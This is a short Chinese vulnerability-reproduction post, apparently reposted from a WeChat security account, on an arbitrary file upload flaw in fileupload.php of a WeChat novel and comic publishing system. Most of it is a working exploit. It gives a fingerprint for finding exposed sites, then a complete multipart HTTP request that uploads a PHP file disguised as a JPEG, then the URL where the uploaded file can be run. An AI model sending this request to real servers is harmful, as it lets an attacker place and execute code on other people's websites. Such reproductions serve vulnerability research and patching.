微信公众号小说漫画系统集成了小说漫画的管理、发布和阅读功能,支持用户直接获取内容。系统内置丰富题材资源,满足多样阅读需求,增强用户黏性;支持作者入驻和作品上传,并提供微信小程序、H5网页、公众号和原生APP等多终端访问。
body="/Public/home/mhjs/jquery.js"
POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/2
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqvlfcogulumndzor
Content-Length: 218
------WebKitFormBoundaryqvlfcogulumndzor
Content-Disposition: form-data; name="file"; filename="ert.php"
Content-Type: image/jpeg
__FILE__); phpinfo();unlink(
------WebKitFormBoundaryqvlfcogulumndzor
访问上传的ert.php文件
https://IP/Public/webuploader/0.1.5/server/upload/ert.php
批量检测(批量检测POC工具请在公众号知识星球获取):
原文始发于微信公众号(白帽攻防):【漏洞复现】微信公众号小说漫画系统 fileupload.php 任意文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论